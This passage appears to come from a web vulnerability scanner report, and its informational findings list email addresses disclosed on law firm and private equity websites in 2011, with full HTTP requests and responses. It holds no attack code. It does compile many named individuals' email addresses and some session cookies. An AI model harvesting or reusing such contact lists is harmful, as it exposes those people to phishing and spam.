<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Moritt Hock & Hamroff LLP A
...[SNIP]...
<a href="mailto:tarenth@moritthock.com">
...[SNIP]...
<a href="mailto:lberkoff@moritthock.com">
...[SNIP]...
<a href="mailto:kbraun@moritthock.com">
...[SNIP]...
<a href="mailto:mcardello@moritthock.com">
...[SNIP]...
<a href="mailto:cclarke@moritthock.com">
...[SNIP]...
<a href="mailto:rcohen@moritthock.com">
...[SNIP]...
<a href="mailto:dcohen@moritthock.com">
...[SNIP]...
<a href="mailto:tdriscoll@moritthock.com">
...[SNIP]...
<a href="mailto:mespey@moritthock.com">
...[SNIP]...
<a href="mailto:rfernbach@moritthock.com">
...[SNIP]...
<a href="mailto:bgarver@moritthock.com">
...[SNIP]...
<a href="mailto:bgeizhals@moritthock.com">
...[SNIP]...
<a href="mailto:sginsberg@moritthock.com">
...[SNIP]...
<a href="mailto:mgreenberg@moritthock.com">
...[SNIP]...
<a href="mailto:chamada@moritthock.com">
...[SNIP]...
<a href="mailto:nhampton@moritthock.com">
...[SNIP]...
<a href="mailto:mhamroff@moritthock.com">
...[SNIP]...
<a href="mailto:wheberer@moritthock.com">
...[SNIP]...
<a href="mailto:ghisiger@moritthock.com">
...[SNIP]...
<a href="mailto:ahock@moritthock.com">
...[SNIP]...
<a href="mailto:bklineberg@moritthock.com">
...[SNIP]...
<a href="mailto:hklosowski@moritthock.com">
...[SNIP]...
<a href="mailto:lkoroleva@moritthock.com">
...[SNIP]...
<a href="mailto:dkucica@moritthock.com">
...[SNIP]...
<a href="mailto:wlaino@moritthock.com">
...[SNIP]...
<a href="mailto:klawrence@moritthock.com">
...[SNIP]...
<a href="mailto:emencher@moritthock.com">
...[SNIP]...
<a href="mailto:lmendelson@moritthock.com">
...[SNIP]...
<a href="mailto:nmoritt@moritthock.com">
...[SNIP]...
<a href="mailto:joneil@moritthock.com">
...[SNIP]...
<a href="mailto:dorourke@moritthock.com">
...[SNIP]...
<a href="mailto:lpistilli@moritthock.com">
...[SNIP]...
<a href="mailto:mre@moritthock.com">
...[SNIP]...
<a href="mailto:dsaperman@moritthock.com">
...[SNIP]...
<a href="mailto:rschonfeld@moritthock.com">
...[SNIP]...
<a href="mailto:sstein@moritthock.com">
...[SNIP]...
<a href="mailto:jsummers@moritthock.com">
...[SNIP]...
<a href="mailto:rtils@moritthock.com">
...[SNIP]...
<a href="mailto:jtrafimow@moritthock.com">
...[SNIP]...
<a href="mailto:sturman@moritthock.com">
...[SNIP]...
<a href="mailto:ewalsh@moritthock.com">
...[SNIP]...
<a href="mailto:dwechsler@moritthock.com">
...[SNIP]...
<a href="mailto:rzelin@moritthock.com">
...[SNIP]...

22.66. http://www.opalgroup.net/conferencehtml/current/alternative_investing_summit/alternative_investing_summit.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opalgroup.net
Path:	/conferencehtml/current/alternative_investing_summit/alternative_investing_summit.php

Issue detail

The following email address was disclosed in the response:

info@opalgroup.net

Request

GET /conferencehtml/current/alternative_investing_summit/alternative_investing_summit.php HTTP/1.1
Host: www.opalgroup.net
Proxy-Connection: keep-alive
Referer: http://www.opalgroup.net/google/ais2010.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263800786.1305198075.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=263800786.1531298615.1305198075.1305198075.1305198075.1; __utmc=263800786; __utmb=263800786.1.10.1305198075

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:01:17 GMT
Server: Apache/2.2.6 (Unix)
X-Powered-By: PHP/5.2.5
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:info@opalgroup.net" target="_blank"> info@opalgroup.net</a>
...[SNIP]...

22.67. https://www.opalgroup.net/js/chainedselects.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.opalgroup.net
Path:	/js/chainedselects.js

Issue detail

The following email address was disclosed in the response:

m_yangxin@hotmail.com

Request

GET /js/chainedselects.js HTTP/1.1
Host: www.opalgroup.net
Connection: keep-alive
Referer: https://www.opalgroup.net/forms/register/register.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263800786.1305198075.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=263800786.1531298615.1305198075.1305198075.1305198075.1; __utmc=263800786; __utmb=263800786.1.10.1305198075; ysm_CK1LB5284PBIITG1JA527G8HOJM5S=ysm_PV1LB5284PBIITG1JA527G8HOJM5S:1&ysm_SN1LB5284PBIITG1JA527G8HOJM5S:1305198080505&ysm_LD1LB5284PBIITG1JA527G8HOJM5S:0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:47 GMT
Server: Apache/2.2.6 (Unix)
Last-Modified: Tue, 15 Mar 2011 16:51:03 GMT
ETag: "408186-19b0-3bceebc0"
Accept-Ranges: bytes
Content-Length: 6576
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

// Chained Selects

// Copyright Xin Yang 2004
// Web Site: www.yxScripts.com
// EMail: m_yangxin@hotmail.com
// Last Updated: 2004-08-23

// This script is free as long as the copyright notice remains intact.

var _disable_empty_list=false;
var _hide_empty_list=false;

// ------
if (typeof(disable_empty_list
...[SNIP]...

22.68. http://www.pepperlaw.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pepperlaw.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

austinj@pepperlaw.com
phinfo@pepperlaw.com

Request

GET / HTTP/1.1
Host: www.pepperlaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nh0wgw55jxz1ajufvrh0mnva; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:02:59 GMT
Content-Length: 14391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Law Firm Of Pe
...[SNIP]...
<meta name="reply-to" content="austinj@pepperlaw.com" />
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com"> phinfo@pepperlaw.com</a>
...[SNIP]...

22.69. http://www.pepperlaw.com/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pepperlaw.com
Path:	/contact.aspx

Issue detail

The following email addresses were disclosed in the response:

austinj@pepperlaw.com
phinfo@pepperlaw.com

Request

GET /contact.aspx HTTP/1.1
Host: www.pepperlaw.com
Proxy-Connection: keep-alive
Referer: http://www.pepperlaw.com/ourlawyers.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yg2qbx45bzklvx45kxaoj2m1; __utmz=54737834.1305201782.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=3; __utma=54737834.474882389.1305201782.1305201782.1305201782.1; __utmc=54737834; __utmb=54737834.3.10.1305201782

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:04:01 GMT
Content-Length: 25427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Co
...[SNIP]...
<meta name="reply-to" content="austinj@pepperlaw.com" />
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com">phinfo@pepperlaw.com</a>
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com"> phinfo@pepperlaw.com</a>
...[SNIP]...

22.70. http://www.pepperlaw.com/contact_Comments.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pepperlaw.com
Path:	/contact_Comments.aspx

Issue detail

The following email addresses were disclosed in the response:

austinj@pepperlaw.com
phinfo@pepperlaw.com
sparksn@pepperlaw.com

Request

GET /contact_Comments.aspx HTTP/1.1
Host: www.pepperlaw.com
Proxy-Connection: keep-alive
Referer: http://www.pepperlaw.com/contact.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yg2qbx45bzklvx45kxaoj2m1; __utmz=54737834.1305201782.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=3; __utma=54737834.474882389.1305201782.1305201782.1305201782.1; __utmc=54737834; __utmb=54737834.5.10.1305201782

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:04:51 GMT
Content-Length: 10453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Co
...[SNIP]...
<meta name="reply-to" content="austinj@pepperlaw.com" />
...[SNIP]...
<a href="mailto:austinj@pepperlaw.com">austinj@pepperlaw.com</a>
...[SNIP]...
<a href="mailto:sparksn@pepperlaw.com">sparksn@pepperlaw.com</a>
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com"> phinfo@pepperlaw.com</a>
...[SNIP]...

22.71. http://www.pepperlaw.com/ourlawyers.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pepperlaw.com
Path:	/ourlawyers.aspx

Issue detail

The following email addresses were disclosed in the response:

austinj@pepperlaw.com
phinfo@pepperlaw.com

Request

GET /ourlawyers.aspx HTTP/1.1
Host: www.pepperlaw.com
Proxy-Connection: keep-alive
Referer: http://www.pepperlaw.com/publications.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yg2qbx45bzklvx45kxaoj2m1; __utmz=54737834.1305201782.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=3; __utma=54737834.474882389.1305201782.1305201782.1305201782.1; __utmc=54737834; __utmb=54737834.2.10.1305201782

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:03:59 GMT
Content-Length: 76849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Co
...[SNIP]...
<meta name="reply-to" content="austinj@pepperlaw.com" />
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com"> phinfo@pepperlaw.com</a>
...[SNIP]...

22.72. http://www.pepperlaw.com/publications.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pepperlaw.com
Path:	/publications.aspx

Issue detail

The following email addresses were disclosed in the response:

austinj@pepperlaw.com
phinfo@pepperlaw.com

Request

GET /publications.aspx HTTP/1.1
Host: www.pepperlaw.com
Proxy-Connection: keep-alive
Referer: http://www.pepperlaw.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yg2qbx45bzklvx45kxaoj2m1; __utmz=54737834.1305201782.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=54737834.474882389.1305201782.1305201782.1305201782.1; __utmc=54737834; __utmb=54737834.1.10.1305201782; fcspersistslider1=3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:03:50 GMT
Content-Length: 100892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Co
...[SNIP]...
<meta name="reply-to" content="austinj@pepperlaw.com" />
...[SNIP]...
<a href="mailto:phinfo@pepperlaw.com"> phinfo@pepperlaw.com</a>
...[SNIP]...

22.73. http://www.pillsburylaw.com/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pillsburylaw.com
Path:	/index.cfm

Issue detail

The following email address was disclosed in the response:

deborah.thorenpeden@pillsburylaw.com

Request

Response

22.74. http://www.pillsburylaw.com/scripts/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pillsburylaw.com
Path:	/scripts/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /scripts/jquery.cookie.js HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.1.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Length: 4028
Content-Type: application/x-javascript
Content-Location: http://www.pillsburylaw.com/scripts/jquery.cookie.js
Last-Modified: Thu, 28 Aug 2008 22:10:55 GMT
Accept-Ranges: bytes
ETag: "2f547f15a9c91:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:31:40 GMT

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

22.75. http://www.pillsburylaw.com/scripts/jquery.dimensions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pillsburylaw.com
Path:	/scripts/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

brandon.aaron@gmail.com
paul.bakaus@googlemail.com

Request

GET /scripts/jquery.dimensions.js HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response

HTTP/1.1 200 OK
Content-Length: 2525
Content-Type: application/x-javascript
Content-Location: http://www.pillsburylaw.com/scripts/jquery.dimensions.js
Last-Modified: Wed, 16 Apr 2008 15:17:28 GMT
Accept-Ranges: bytes
ETag: "caa48dfbd49fc81:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:22:05 GMT

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $Las
...[SNIP]...

22.76. http://www.pomerantzlaw.com/attorneys.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pomerantzlaw.com
Path:	/attorneys.html

Issue detail

The following email address was disclosed in the response:

chamer@pomlaw.com

Request

Response

22.77. http://www.pomerantzlaw.com/attorneys.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pomerantzlaw.com
Path:	/attorneys.html

Issue detail

The following email address was disclosed in the response:

sjweiswasser@pomlaw.com

Request

GET /attorneys.html?action=attorneyDetail&attorneyID=15 HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.5.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:55:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 9647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
<a href="mailto:sjweiswasser@pomlaw.com">sjweiswasser@pomlaw.com</a>
...[SNIP]...

22.78. http://www.pomerantzlaw.com/cases.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pomerantzlaw.com
Path:	/cases.html

Issue detail

The following email addresses were disclosed in the response:

gfbruckner@pomlaw.com
rrboyle@pomlaw.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=ee3f1093%2D41a1%2D4002%2D9045%2D87d36bf03195; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Set-Cookie: CFTOKEN=0; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
<br />    CKx shareholders seeking more information about this acquisition are advised to contact Gustavo Bruckner, Esq. at gfbruckner@pomlaw.com or 212-661-1100 or toll free at 888-476-6529, ext. 302. Shareholders may also contact Rachelle R. Boyle at rrboyle@pomlaw.com or 212-661-1100 or 888-476-6529, ext. 237.</p>
...[SNIP]...

22.79. http://www.pomerantzlaw.com/contact-us.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pomerantzlaw.com
Path:	/contact-us.html

Issue detail

The following email addresses were disclosed in the response:

info@pomlaw.com
josh@emailmessaging.net

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 10359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
<input style="width: 156px; height: 22px;" name="admin_email_addr" size="20" type="hidden" value="info@pomlaw.com ,josh@emailmessaging.net" />
...[SNIP]...

22.80. http://www.privateequityinfo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

info@privateequityinfo.com
subscriptions@privateequityinfo.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Set-Cookie: PHPSESSID=eq1oat81k7im20tchffed7ii03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25258

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Firms, Hedge Funds, Mezzanine Investors, Small Business Investment Companies (SBIC), Valuation Fi
...[SNIP]...
<meta name="author" content="Andy Jones private equity info privateequityinfo.com info@privateequityinfo.com (512)771-3943">
...[SNIP]...
<meta http-equiv="reply-to" content="info@privateequityinfo.com">
...[SNIP]...
<a href="mailto:subscriptions@privateequityinfo.com" class="newGraySmall"><u>subscriptions@privateequityinfo.com</u>
...[SNIP]...

22.81. http://www.privateequityinfo.com/forgotpassword.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/forgotpassword.php

Issue detail

The following email addresses were disclosed in the response:

info@privateequityinfo.com
subscriptions@privateequityinfo.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Content-Type: text/html
Content-Length: 21431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Info - Forgot Your Password?</title>
<meta name="description" content="Database of private equit
...[SNIP]...
<meta name="author" content="Andy Jones private equity info privateequityinfo.com info@privateequityinfo.com (512)771-3943">
...[SNIP]...
<meta http-equiv="reply-to" content="info@privateequityinfo.com">
...[SNIP]...
<a href="mailto:subscriptions@privateequityinfo.com" class="newGraySmall"><u>subscriptions@privateequityinfo.com</u>
...[SNIP]...

22.82. http://www.privateequityinfo.com/product_details.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/product_details.php

Issue detail

The following email addresses were disclosed in the response:

info@privateequityinfo.com
subscriptions@privateequityinfo.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 58851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Product details</title>
<meta name="description" content="Database of Private Equity Firms, Hedge Funds, Mezzan
...[SNIP]...
<meta name="author" content="Andy Jones private equity info privateequityinfo.com info@privateequityinfo.com (512)771-3943">
...[SNIP]...
<meta http-equiv="reply-to" content="info@privateequityinfo.com">
...[SNIP]...
<a href="mailto:subscriptions@privateequityinfo.com" class="newGraySmall"><u>subscriptions@privateequityinfo.com</u>
...[SNIP]...

22.83. http://www.provequity.com/news/releases/SRA%20Press%20Release%204%201%2011.PDF previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.provequity.com
Path:	/news/releases/SRA%20Press%20Release%204%201%2011.PDF

Issue detail

The following email addresses were disclosed in the response:

acole@sardverb.com
david_mutryn@sra.com
lneugart@sardverb.com
sheila_blackwell@sra.com

Request

GET /news/releases/SRA%20Press%20Release%204%201%2011.PDF HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASAQTRCB=LPLHPCLDNJEEPELPGFENDPFK

Response

HTTP/1.1 200 OK
Content-Length: 120431
Content-Type: application/pdf
Last-Modified: Fri, 01 Apr 2011 14:53:26 GMT
Accept-Ranges: bytes
ETag: "4e29608e7cf0cb1:913"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:49:23 GMT

%PDF-1.3
%....
1 0 obj
<<
/Fields []
/DR 63 0 R
>>
endobj
2 0 obj
<<
/Type /Catalog
/Pages 65 0 R
/AcroForm 1 0 R
>>
endobj
3 0 obj
<<
/Type /Page
/Parent 65 0 R
/MediaBox [0 0 612 792]
/Resources <
...[SNIP]...
</Type /Action /S /URI /URI (mailto:sheila_blackwell@sra.com)>
...[SNIP]...
</Type /Action /S /URI /URI (mailto:acole@sardverb.com)>
...[SNIP]...
</Type /Action /S /URI /URI (mailto:lneugart@sardverb.com)>
...[SNIP]...
</Type /Action /S /URI /URI (mailto:david_mutryn@sra.com)>
...[SNIP]...

